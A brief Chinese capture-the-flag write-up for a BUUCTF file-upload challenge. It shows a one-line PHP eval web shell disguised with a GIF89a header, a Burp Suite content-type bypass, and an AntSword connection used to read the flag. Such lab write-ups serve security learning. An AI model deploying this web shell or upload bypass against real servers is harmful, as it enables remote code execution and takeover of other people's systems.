buuctf-web [极客大挑战 2019]Upload 1

启动靶机，打开环境

 

 又是一道Upload题。

根据上一道题的思路来，

先上传一个phtml文件

GIF89a
<script language="php">eval($_POST['shell']);</script> 

 

 上面显示Not image

那我们用bp来抓一下包。

 

 然后修改一下格式

 

 然后这里已经显示了。说明上传成功了，但是它并没有显示明显的路径，那我们猜测应该是存在/upload的路径之下，所以我们用蚁剑连接一下

 

 添加上数据，然后flag就是根目录下。